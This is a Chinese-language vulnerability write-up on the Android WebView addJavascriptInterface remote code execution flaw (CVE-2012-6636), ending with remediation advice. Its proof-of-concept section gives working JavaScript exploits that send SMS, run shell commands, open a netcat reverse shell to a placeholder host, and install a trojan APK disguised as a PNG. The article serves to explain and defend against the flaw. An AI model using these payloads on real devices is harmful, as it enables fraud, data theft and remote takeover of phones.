1. WebView 遠(yuǎn)程代碼執(zhí)行漏洞描述

      Android API level 16以及之前的版本存在遠(yuǎn)程代碼執(zhí)行安全漏洞，該漏洞源于程序沒有正確限制使用WebView.addJavascriptInterface方法，遠(yuǎn)程攻擊者可通過使用Java Reflection API利用該漏洞執(zhí)行任意Java對(duì)象的方法，簡單的說就是通過addJavascriptInterface給WebView加入一個(gè)JavaScript橋接接口，JavaScript通過調(diào)用這個(gè)接口可以直接操作本地的JAVA接口。該漏洞最早公布于CVE-2012-6636【1】，其描述了WebView中addJavascriptInterface API導(dǎo)致的遠(yuǎn)程代碼執(zhí)行安全漏洞。

      該漏洞公布的近期，多款A(yù)ndroid流行應(yīng)用曾被曝出高危掛馬漏洞：點(diǎn)擊消息或朋友社區(qū)圈中的一條網(wǎng)址時(shí)，用戶手機(jī)然后就會(huì)自動(dòng)執(zhí)行被掛馬的代碼指令，從而導(dǎo)致被安裝惡意扣費(fèi)軟件、向好友發(fā)送欺詐短信、通訊錄和短信被竊取以及被遠(yuǎn)程控制等嚴(yán)重后果。在烏云漏洞平臺(tái)上，包括Android版的微信、QQ、騰訊微博、QQ瀏覽器、快播、百度瀏覽器、金山瀏覽器等大批TOP應(yīng)用均被曝光同類型的漏洞。

      論文Attacks on WebView in the Android System【2】中指出可以利用所導(dǎo)出的讀寫文件接口來進(jìn)行文件的讀寫操作，攻擊者可以通過中間人攻擊篡改Webview所顯示的頁面來達(dá)到對(duì)手機(jī)文件系統(tǒng)的控制。

2. WebView 遠(yuǎn)程代碼執(zhí)行影響范圍

      Android API level 小于17 (即Android 4.2之前的系統(tǒng)版本)

3.WebView 遠(yuǎn)程代碼執(zhí)行漏洞詳情

1) WebView 遠(yuǎn)程代碼執(zhí)行漏洞位置:

      WebView.addJavascriptInterface(Object obj, String interfaceName)

2)WebView 遠(yuǎn)程代碼執(zhí)行漏洞觸發(fā)前提條件：

      使用addJavascriptInterface方法注冊可供JavaScript調(diào)用的Java對(duì)象；

      使用WebView加載外部網(wǎng)頁或者本地網(wǎng)頁；

      Android系統(tǒng)版本低于4.2；

3) WebView 遠(yuǎn)程代碼執(zhí)行漏洞原理：

      Android系統(tǒng)通過WebView.addJavascriptInterface方法注冊可供JavaScript調(diào)用的Java對(duì)象，以用于增強(qiáng)JavaScript的功能。但是系統(tǒng)并沒有對(duì)注冊Java類的方法調(diào)用的限制。導(dǎo)致攻擊者可以利用反射機(jī)制調(diào)用未注冊的其它任何Java類，最終導(dǎo)致JavaScript能力的無限增強(qiáng)。攻擊者利用該漏洞可以根據(jù)客戶端能力為所欲為。

4. WebView 遠(yuǎn)程代碼執(zhí)行漏洞POC

      1) 利用addJavascriptInterface方法注冊可供JavaScript調(diào)用的java對(duì)象 “injectedObj”，利用反射機(jī)制調(diào)用Android API sendTextMessage來發(fā)送短信。

      java代碼：

mWebView = new WebView(this);
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(this, "injectedObj");
mWebView.loadUrl(file:///android_asset/www/index.html);

      EXP的JavaScript代碼：

<html>
 <body>
 <script>
  var objSmsManager = injectedObj.getClass().forName("android.telephony.SmsManager").getM ethod("getDefault",null).invoke(null,null);
  objSmsManager.sendTextMessage("10086",null,"this message is sent by JS when webview is loading",null,null);
 </script>
 </body>
</html>

      2) 利用addJavascriptInterface方法注冊可供JavaScript調(diào)用的java對(duì)象 “injectedObj”，利用反射機(jī)制調(diào)用Android API getRuntime執(zhí)行shell命令：

      EXP的JavaScript代碼：

<html>
 <body>
 <script>
  function execute(cmdArgs)
  {
  return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
  }

  var res = execute(["/system/bin/sh", "-c", "ls -al /mnt/sdcard/"]);
  document.write(getContents(res.getInputStream()));
 </script>
 </body>
</html>

      利用后的執(zhí)行結(jié)果：

      3) 利用addJavascriptInterface方法注冊可供JavaScript調(diào)用的java對(duì)象 “injectedObj”，利用反射機(jī)制調(diào)用Android API getRuntime執(zhí)行shell命令，達(dá)到反彈一個(gè)手機(jī)端的shell到遠(yuǎn)程控制端的目的：

      EXP的JavaScript代碼：

<html>
 <body>
 <script>
  function execute(cmdArgs)
  {
  return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
  }
  execute(["/system/bin/sh","-c","rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/system/bin/sh -i 2>&1|nc x.x.x.x 9099 >/tmp/f"]);
 </script>
 </body>
</html>

      執(zhí)行后的結(jié)果：

      4) 利用addJavascriptInterface方法注冊可供JavaScript調(diào)用的java對(duì)象 “injectedObj”，利用反射機(jī)制調(diào)用Android API getRuntime執(zhí)行shell命令進(jìn)行掛馬：a安裝木馬應(yīng)用APK, b 安裝執(zhí)行ELF可執(zhí)行程序；

      簡單的安裝發(fā)送短信木馬APK，EXP的JavaScript代碼：

<html>
 <body>
 <script>
  function execute(cmdArgs)
  {
  return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
  }
  var apk = "\\x50\\x4B\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00\\x62 \\xB9\\x15\\x30\\x3D\\x07\\x01\\x00\\x00\\x7C\\x01\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xD6\\x0D\\x00\\x00\\x4D\\x45\\x54\\x41\\x2D\\x49\\x4E\\x46\\x2F\\x43\\x45\\x52\\x54\\x2E\\x53------------------------------------------------------------ \\x4D\\x45\\x54\\x41\\x2D\\x49\\x4E\\x46\\x2F\\x43\\x45\\x52\\x54\\x2E\\x52\\x53\\x41\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x07\\x00\\x07\\x00\\xBA\\x01\\x00\\x00\\xB6\\x11\\x00\\x00\\x00\\x00"
  execute(["/system/bin/sh","-c","echo '"+apk+"' > /data/data/com.example.hellojs/fake.png"]);
  execute(["chmod","755","/data/data/com.example.hellojs/fake.png"]);
  execute(["su","-c","pm install -r /data/data/com.example.hellojs/fake.png"]);
 </script>
 </body>
</html>

      由下圖可得知我們已經(jīng)拼接成了一個(gè)APK程序，并偽裝成一張png圖片：

      由下圖可知，我們已經(jīng)成功安裝fake.png APK程序：

      例如網(wǎng)上流行的Androrat遠(yuǎn)程控制程序，攻擊者利用上述漏洞即可簡單的安裝此遠(yuǎn)程控制木馬應(yīng)用APK即可達(dá)到遠(yuǎn)程控制用戶手機(jī)的目的。   

      利用漏洞拼接可執(zhí)行ELF程序，并執(zhí)行該ELF程序達(dá)到為所欲為的目的，博文Abusing WebView JavaScript Bridges

【3】還實(shí)現(xiàn)了在非root情況下利用ELF可執(zhí)行程序偷取sdcard的文件的POC，由此可見，該漏洞的危害性極大：

     EXP的JavaScript代碼：

<html>
 <body>
  <script>
   function execute(cmdArgs)
   {
    return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
   }
   var bin = "\\x7F\\x45\\x4C\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x28\\x00\\x01\\x00\\x00\\x00\\xE4\\x83\\x00\\x00\\x34\\x00\\x00\\x00\\x58\\x21\\x00\\x00\\x00\\x00\\x00\\x05\\x34\\x00\\x20\\x00\\x08\\x00\\x28\\x00\\x18\\x00\\x17\\x00\\x06\\x00\\x00\\x00\\x34\\x00\\x00\\x00\\x34\\x80\\x00\\x00\\x34\\x80\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x34\\x01\\x00\\x00\\x34\\x81\\x00\\x00\\x34\\x81\\x00\\x00\\x13--------------------------------------------------------------------------------------------------------------------------------\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x00\\x03\\x00\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x20\\x00\\x00\\x2D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x71\\x20\\x00\\x00\\xE4\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00";
   execute(["/system/bin/sh","-c","echo '" + bin + "' > /data/data/com.example.hellojs/testBin"]);
   execute(["chmod","755","/data/data/com.example.hellojs/testBin"]);
   var res = execute(["/data/data/com.example.hellojs/testBin"]);
   document.write(getContents(res.getInputStream()));
  </script>
 </body>
</html>

      “testBin”文件已拼接生成，如下圖所示：

      執(zhí)行之后的結(jié)果如下：

5. WebView遠(yuǎn)程代碼執(zhí)行漏洞修復(fù)建議

1. API Level等于或高于17的Android系統(tǒng)【4】

      出于安全考慮，為了防止Java層的函數(shù)被隨便調(diào)用，Google在4.2版本之后，規(guī)定允許被調(diào)用的函數(shù)必須以@JavascriptInterface進(jìn)行注解，所以如果某應(yīng)用依賴的API Level為17或者以上，就不會(huì)受該問題的影響（注：Android 4.2中API Level小于17的應(yīng)用也會(huì)受影響）。按照Google官方文檔[5]使用示例：

class JsObject {
 @JavascriptInterface
 public String toString() { return "injectedObject"; }
}
webView.addJavascriptInterface(new JsObject(), "injectedObject");
webView.loadData("", "text/html", null);
webView.loadUrl("javascript:alert(injectedObject.toString())");

2. API Level等于或高于17的Android系統(tǒng)

      建議不要使用addJavascriptInterface接口，以免帶來不必要的安全隱患，請參照博文《在Webview中如何讓JS與Java安全地互相調(diào)用》[6]。

      如果一定要使用addJavascriptInterface接口:

      1) 如果使用HTTPS協(xié)議加載URL，應(yīng)進(jìn)行證書校驗(yàn)防止訪問的頁面被篡改掛馬；

      2) 如果使用HTTP協(xié)議加載URL，應(yīng)進(jìn)行白名單過濾、完整性校驗(yàn)等防止訪問的頁面被篡改；

      3) 如果加載本地Html，應(yīng)將html文件內(nèi)置在APK中，以及進(jìn)行對(duì)html頁面完整性的校驗(yàn)；

3. 移除Android系統(tǒng)內(nèi)部的默認(rèn)內(nèi)置接口

      同時(shí)，在2014年發(fā)現(xiàn)在Android系統(tǒng)中webkit中默認(rèn)內(nèi)置的一個(gè)searchBoxJavaBridge_ 接口同時(shí)存在遠(yuǎn)程代碼執(zhí)行漏洞，該漏洞公布于CVE-2014-1939[7], 建議開發(fā)者通過以下方式移除該Javascript接口:    

 removeJavascriptInterface("searchBoxJavaBridge_") 

      2014年香港理工大學(xué)的研究人員Daoyuan Wu和Rocky Chang發(fā)現(xiàn)了兩個(gè)新的攻擊向量存在于android/webkit/AccessibilityInjector.java中，分別是"accessibility" 和"accessibilityTraversal" ，調(diào)用了此組件的應(yīng)用在開啟輔助功能選項(xiàng)中第三方服務(wù)的安卓系統(tǒng)中會(huì)造成遠(yuǎn)程代碼執(zhí)行漏洞。該漏洞公布于CVE-2014-7224, 此漏洞原理與searchBoxJavaBridge_接口遠(yuǎn)程代碼執(zhí)行相似，均為未移除不安全的默認(rèn)接口，建議開發(fā)者通過以下方式移除該JavaScript接口：

removeJavascriptInterface("accessibility")；
 removeJavascriptInterface("accessibilityTraversal")；

參考文章

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6636

[2] Attacks on WebView in the Android System

[3] http://50.56.33.56/blog/?p=314

[4] Google Official Android API Level Reference

[5] http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)

[6] 在Webview中如何讓JS與Java安全地互相調(diào)用

[7] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1939

總結(jié)

以上就是這篇文章的全部內(nèi)容了，希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值，如果有疑問大家可以留言交流，謝謝大家對(duì)腳本之家的支持。